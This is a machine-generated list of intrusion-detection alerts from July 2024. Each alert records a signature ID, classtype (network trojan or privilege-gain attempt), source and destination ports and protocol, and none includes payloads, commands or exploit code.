                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.426187
                      SID:2027339
                      Source Port:36012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2829579
                      Source Port:59674
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.994337
                      SID:2829579
                      Source Port:45722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.476638
                      SID:2027339
                      Source Port:37504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2829579
                      Source Port:58940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.311906
                      SID:2027339
                      Source Port:58730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.453951
                      SID:2025132
                      Source Port:42502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.912337
                      SID:2025132
                      Source Port:36424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:05.506482
                      SID:2027339
                      Source Port:59958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.693711
                      SID:2027339
                      Source Port:50610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.631448
                      SID:2027339
                      Source Port:34526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.556921
                      SID:2025132
                      Source Port:39934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2829579
                      Source Port:45192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2829579
                      Source Port:60866
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313163
                      SID:2831300
                      Source Port:59674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.530468
                      SID:2831300
                      Source Port:49066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2829579
                      Source Port:34212
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.152427
                      SID:2829579
                      Source Port:54164
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.696197
                      SID:2025132
                      Source Port:41620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.598416
                      SID:2831300
                      Source Port:33108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.156178
                      SID:2027339
                      Source Port:58330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.648489
                      SID:2835222
                      Source Port:36536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.140178
                      SID:2027339
                      Source Port:57756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.501891
                      SID:2025132
                      Source Port:46770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.886795
                      SID:2831300
                      Source Port:51338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.311124
                      SID:2835222
                      Source Port:38954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.989167
                      SID:2835222
                      Source Port:40944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.387600
                      SID:2027339
                      Source Port:47516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.641686
                      SID:2835222
                      Source Port:33626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.124696
                      SID:2835222
                      Source Port:39104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.331820
                      SID:2025132
                      Source Port:48328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.547161
                      SID:2027339
                      Source Port:59820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2829579
                      Source Port:49686
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.165780
                      SID:2831300
                      Source Port:57706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.540580
                      SID:2027339
                      Source Port:49004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2829579
                      Source Port:40652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.790680
                      SID:2025132
                      Source Port:53028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.838689
                      SID:2027339
                      Source Port:55674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.681802
                      SID:2831300
                      Source Port:49888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2835222
                      Source Port:40830
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.717611
                      SID:2027339
                      Source Port:38634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.867104
                      SID:2027339
                      Source Port:37288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.401855
                      SID:2027339
                      Source Port:40012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.974782
                      SID:2829579
                      Source Port:38850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.608574
                      SID:2027339
                      Source Port:55524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.053251
                      SID:2027339
                      Source Port:33236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.135089
                      SID:2025132
                      Source Port:57444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.407067
                      SID:2027339
                      Source Port:56622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.027082
                      SID:2835222
                      Source Port:39308
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.584507
                      SID:2831300
                      Source Port:35960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.563416
                      SID:2831300
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2835222
                      Source Port:45832
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322110
                      SID:2831300
                      Source Port:51984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.647416
                      SID:2025132
                      Source Port:58418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.357440
                      SID:2027339
                      Source Port:56164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.109957
                      SID:2027339
                      Source Port:46940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.580745
                      SID:2831300
                      Source Port:42542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.432263
                      SID:2027339
                      Source Port:46866
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.036130
                      SID:2025132
                      Source Port:43458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.508021
                      SID:2831300
                      Source Port:34132
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:05.010861
                      SID:2025132
                      Source Port:58646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.295497
                      SID:2027339
                      Source Port:36678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650643
                      SID:2835222
                      Source Port:55442
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2835222
                      Source Port:33966
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.575986
                      SID:2831300
                      Source Port:34640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.258056
                      SID:2027339
                      Source Port:40456
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.872561
                      SID:2831300
                      Source Port:45328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.236183
                      SID:2025132
                      Source Port:48494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.915904
                      SID:2835222
                      Source Port:55640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.818739
                      SID:2025132
                      Source Port:49766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2829579
                      Source Port:53792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.277117
                      SID:2025132
                      Source Port:58846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.879276
                      SID:2831300
                      Source Port:60162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.930155
                      SID:2831300
                      Source Port:40160
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.619336
                      SID:2025132
                      Source Port:37076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.313050
                      SID:2831300
                      Source Port:48812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.636583
                      SID:2025132
                      Source Port:43652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.654172
                      SID:2829579
                      Source Port:36154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.280820
                      SID:2025132
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.594120
                      SID:2831300
                      Source Port:43500
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.664887
                      SID:2829579
                      Source Port:48150
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.578308
                      SID:2831300
                      Source Port:42790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.299761
                      SID:2027339
                      Source Port:60246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.946478
                      SID:2025132
                      Source Port:51148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.623848
                      SID:2027339
                      Source Port:57578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.060408
                      SID:2831300
                      Source Port:44768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.149798
                      SID:2835222
                      Source Port:58456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.607934
                      SID:2831300
                      Source Port:59822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.484487
                      SID:2027339
                      Source Port:51746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.000556
                      SID:2027339
                      Source Port:38772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.036130
                      SID:2027339
                      Source Port:39516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.973541
                      SID:2835222
                      Source Port:33252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.090830
                      SID:2835222
                      Source Port:33680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2829579
                      Source Port:42542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.958887
                      SID:2831300
                      Source Port:43122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2829579
                      Source Port:59906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.302806
                      SID:2027339
                      Source Port:38432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.049603
                      SID:2829579
                      Source Port:45854
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2835222
                      Source Port:49544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.261793
                      SID:2027339
                      Source Port:39266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.745622
                      SID:2027339
                      Source Port:41978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.928503
                      SID:2027339
                      Source Port:35990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.459589
                      SID:2027339
                      Source Port:43272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.986571
                      SID:2829579
                      Source Port:41958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.050503
                      SID:2829579
                      Source Port:52282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.353334
                      SID:2025132
                      Source Port:39012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2829579
                      Source Port:46684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044417
                      SID:2835222
                      Source Port:38864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.987185
                      SID:2027339
                      Source Port:34106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.699842
                      SID:2027339
                      Source Port:57614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.494999
                      SID:2027339
                      Source Port:44172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639093
                      SID:2835222
                      Source Port:53158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2829579
                      Source Port:49214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.110964
                      SID:2027339
                      Source Port:46540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.117244
                      SID:2025132
                      Source Port:35798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:01.901550
                      SID:2027339
                      Source Port:33518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.295718
                      SID:2027339
                      Source Port:51266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.279073
                      SID:2027339
                      Source Port:57644
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.250039
                      SID:2831300
                      Source Port:55558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.871315
                      SID:2027339
                      Source Port:47422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.581574
                      SID:2027339
                      Source Port:55926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.355712
                      SID:2027339
                      Source Port:33494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.713934
                      SID:2027339
                      Source Port:37610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.356106
                      SID:2025132
                      Source Port:50206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.131607
                      SID:2025132
                      Source Port:50228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2829579
                      Source Port:51350
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.189596
                      SID:2025132
                      Source Port:49348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.884598
                      SID:2829579
                      Source Port:55218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.809716
                      SID:2025132
                      Source Port:55558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:02.291967
                      SID:2027339
                      Source Port:57042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.150638
                      SID:2835222
                      Source Port:43764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.636533
                      SID:2835222
                      Source Port:59666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2835222
                      Source Port:51062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.203011
                      SID:2835222
                      Source Port:52244
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.038834
                      SID:2027339
                      Source Port:45048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.703257
                      SID:2027339
                      Source Port:51836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.683684
                      SID:2831300
                      Source Port:59490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.806645
                      SID:2831300
                      Source Port:40080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.437626
                      SID:2027339
                      Source Port:60144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.805210
                      SID:2025132
                      Source Port:55998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.474436
                      SID:2027339
                      Source Port:41066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.599362
                      SID:2027339
                      Source Port:51788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.651187
                      SID:2835222
                      Source Port:49850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.991829
                      SID:2027339
                      Source Port:34298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.958922
                      SID:2025132
                      Source Port:60076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.641430
                      SID:2025132
                      Source Port:33448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:13.604911
                      SID:2025132
                      Source Port:45406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.129029
                      SID:2025132
                      Source Port:40978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.279669
                      SID:2835222
                      Source Port:56928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2829579
                      Source Port:34426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.645186
                      SID:2835222
                      Source Port:42260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.146493
                      SID:2027339
                      Source Port:45846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.064358
                      SID:2835222
                      Source Port:53606
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.046652
                      SID:2835222
                      Source Port:42354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.960623
                      SID:2025132
                      Source Port:53334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.749737
                      SID:2835222
                      Source Port:52906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2829579
                      Source Port:35292
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.014688
                      SID:2835222
                      Source Port:58962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.243465
                      SID:2027339
                      Source Port:57270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.693187
                      SID:2831300
                      Source Port:60750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.054387
                      SID:2835222
                      Source Port:43712
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.938688
                      SID:2025132
                      Source Port:49812
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.984532
                      SID:2025132
                      Source Port:40688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2835222
                      Source Port:54670
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.572517
                      SID:2831300
                      Source Port:43378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.325694
                      SID:2027339
                      Source Port:40536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.038410
                      SID:2831300
                      Source Port:54114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.221190
                      SID:2835222
                      Source Port:42650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.677519
                      SID:2829579
                      Source Port:34452
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.419124
                      SID:2025132
                      Source Port:36358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.886284
                      SID:2829579
                      Source Port:56316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633633
                      SID:2829579
                      Source Port:37138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.662969
                      SID:2835222
                      Source Port:51076
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.399866
                      SID:2027339
                      Source Port:44106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.354321
                      SID:2025132
                      Source Port:36176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.097048
                      SID:2025132
                      Source Port:44602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.109958
                      SID:2027339
                      Source Port:36090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.148759
                      SID:2831300
                      Source Port:60412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.620788
                      SID:2831300
                      Source Port:57014
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.572790
                      SID:2831300
                      Source Port:49150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
